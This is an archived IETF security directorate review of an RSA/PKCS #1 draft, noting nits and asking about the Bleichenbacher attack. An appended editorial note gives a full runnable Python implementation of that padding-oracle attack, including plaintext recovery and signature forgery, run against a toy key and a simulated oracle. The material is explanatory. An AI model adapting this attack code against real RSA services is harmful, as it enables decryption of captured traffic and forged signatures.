[secdir] SecDir review of draft-moriarty-pkcs1-01

Paul Wouters <paul@nohats.ca> Fri, 02 September 2016 13:02 UTC

Date: Fri, 02 Sep 2016 09:02:05 -0400
From: Paul Wouters <paul@nohats.ca>
To: iesg@ietf.org, secdir <secdir@ietf.org>
Message-ID: <alpine.LRH.2.20.1609020853040.16363@bofh.nohats.ca>
Archived-At: <https://mailarchive.ietf.org/arch/msg/secdir/5GXxAQXY3OEo63OUvh6gZWMAKsE>
Cc: draft-moriarty-pkcs1.all@ietf.org
Subject: [secdir] SecDir review of draft-moriarty-pkcs1-01

I have reviewed this document as part of the security directorate's 
ongoing effort to review all IETF documents being processed by the 
IESG.  These comments were written primarily for the benefit of the 
security area directors.  Document editors and WG chairs should treat 
these comments just like any other last call comments.

[Note this document describes various RSA modes. I am not a cryptographer]

This document is Ready with nits

This document describes various RSA methods. It explains and describes
various attacks and why certain decisions are made for security reasons
throughout the document. Therefore, the Security Considerations section
simply states:

    Security considerations are discussed throughout this memo.

Which I think is correct. (Although I would use the word "document"
instead of "memo", which I think is more common within the IETF.)

The only real question I have is regarding this paragraph:

    While RSAES-PKCS1-v1_5
    (Section 7.2) and RSASSA-PKCS1-v1_5 (Section 8.2) have traditionally
    been employed together without any known bad interactions (indeed,
    this is the model introduced by PKCS #1 v1.5), such a combined use of
    an RSA key pair is NOT RECOMMENDED for new applications.

I thought that issuing malicious encryption commands to an RSASSA-PKCS1-v1_5
based (software) device could lead to compromise of the private key, and
that this was the Bleichenbacher attack, and that forbidding encryption
for a signing-only service would have a security advantage?


    u distinct odd primes

Do you mean an odd number of primes? As primes are always odd, unless
you mean odd in the English sense :)

    Four types of primitive are

Add an "s" to "primitive"?
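Editorial note on the Bleichenbacher question raised in the review above: the attack (CRYPTO '98) needs an RSAES-PKCS1-v1_5 decryption oracle, i.e. a party that decrypts attacker-chosen ciphertexts with the private key and reveals whether the result is PKCS#1-conformant; it does not recover the private key, it computes c^d mod n for a chosen c. With the blinding step, c can be anything, and c^d mod n is exactly an RSASSA-PKCS1-v1_5 signature over c, which is why the draft says NOT RECOMMENDED for sharing one key pair between the two schemes. The following is an added example, written for this page and not code from the review, the draft or any library. It assumes a toy modulus built from the Mersenne primes 2^521-1 and 2^89-1 (chosen so that the example runs offline in seconds; real keys are 2048 bits or more), an oracle that leaks only whether the decrypted block starts with 00 02, and the function names `padding_oracle`, `bleichenbacher`, `recover_plaintext` and `forge_signature`, all of which are this example's own.

```python
"""Bleichenbacher's padding-oracle attack on RSAES-PKCS1-v1_5 (CRYPTO '98),
and why the same oracle forges RSASSA-PKCS1-v1_5 signatures when one key pair
serves both schemes. Toy key: the factors are the Mersenne primes 2^521-1 and
2^89-1 (an assumption so the example runs offline quickly; real keys are larger)."""
import hashlib, os

P, Q, E = (1 << 521) - 1, (1 << 89) - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))        # gcd(E, phi) = 1 since 32 does not divide 520 or 88
K = (N.bit_length() + 7) // 8            # modulus length in bytes (77)
B = 1 << (8 * (K - 2))                   # every conformant EM satisfies 2B <= EM < 3B

def i2osp(x): return x.to_bytes(K, "big")
def os2ip(b): return int.from_bytes(b, "big")
def ceil_div(a, b): return -(-a // b)

def eme_pkcs1_v15_pad(msg):
    """RFC 8017 7.2.1: EM = 00 02 || PS (>= 8 nonzero random bytes) || 00 || M."""
    ps_len = K - 3 - len(msg)
    assert ps_len >= 8, "message too long"
    ps = bytes(b % 255 + 1 for b in os.urandom(ps_len))   # never 0x00
    return b"\x00\x02" + ps + b"\x00" + msg

def emsa_pkcs1_v15_encode(msg):
    """RFC 8017 9.2: EM = 00 01 || FF..FF || 00 || DigestInfo(SHA-256(msg))."""
    t = bytes.fromhex("3031300d060960864801650304020105000420") + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (K - 3 - len(t)) + b"\x00" + t

def encrypt(msg): return pow(os2ip(eme_pkcs1_v15_pad(msg)), E, N)
def verify(msg, sig): return i2osp(pow(sig, E, N)) == emsa_pkcs1_v15_encode(msg)

def padding_oracle(c):
    """The victim: decrypts with the private key and leaks one bit, whether EM
    starts with 00 02 (in practice via an error code, a TLS alert or timing).
    A stricter check (PS length, separator present) only raises the query count."""
    return i2osp(pow(c, D, N))[:2] == b"\x00\x02"

def bleichenbacher(c, oracle):
    """Attacker: compute c^D mod N using only the public key and the oracle."""
    queries = 0
    def conformant(c0, s):
        nonlocal queries
        queries += 1
        return oracle(c0 * pow(s, E, N) % N)      # asks: is 2B <= m*s mod N < 3B ?
    s0 = 1                                         # step 1: blind until conformant
    while not conformant(c, s0):
        s0 += 1
    c0 = c * pow(s0, E, N) % N
    M = [(2 * B, 3 * B - 1)]                      # m0 = c0^D lies in this interval
    s = ceil_div(N, 3 * B)                        # step 2.a: smallest s that can wrap
    while not conformant(c0, s):
        s += 1
    while True:
        # step 3: m0*s - r*N in [2B, 3B) for some r restricts m0 to sub-intervals
        new = []
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo = max(a, ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = []
        for lo, hi in sorted(new):                # merge overlapping intervals
            if M and lo <= M[-1][1] + 1:
                M[-1] = (M[-1][0], max(M[-1][1], hi))
            else:
                M.append((lo, hi))
        if len(M) == 1 and M[0][0] == M[0][1]:    # step 4: m0 is pinned down
            return M[0][0] * pow(s0, -1, N) % N, queries   # unblind: m = m0 / s0
        if len(M) > 1:                            # step 2.b: keep searching linearly
            s += 1
            while not conformant(c0, s):
                s += 1
        else:                                     # step 2.c: pick r, search a narrow s range
            a, b = M[0]
            r = ceil_div(2 * (b * s - 2 * B), N)
            while True:
                cands = range(ceil_div(2 * B + r * N, b), (3 * B - 1 + r * N) // a + 1)
                s = next((t for t in cands if conformant(c0, t)), None)
                if s is not None:
                    break
                r += 1

def recover_plaintext(c):
    """Decrypt a captured RSAES-PKCS1-v1_5 ciphertext without the private key."""
    em = i2osp(bleichenbacher(c, padding_oracle)[0])
    return em[em.index(b"\x00", 2) + 1:]

def forge_signature(msg):
    """Same oracle, same key pair: EM_sig^D mod N is a valid RSASSA-PKCS1-v1_5 signature."""
    return bleichenbacher(os2ip(emsa_pkcs1_v15_encode(msg)), padding_oracle)[0]
```

`recover_plaintext(encrypt(b"..."))` returns the message, and `verify(msg, forge_signature(msg))` is True even though the attacker never touched `D`: the oracle answered a few thousand yes/no questions, and the blinding step turned the non-conformant signature block into a conformant ciphertext. A signing-only RSASSA-PKCS1-v1_5 service offers no such oracle because it never decrypts attacker-chosen input, which is the advantage of separating the keys.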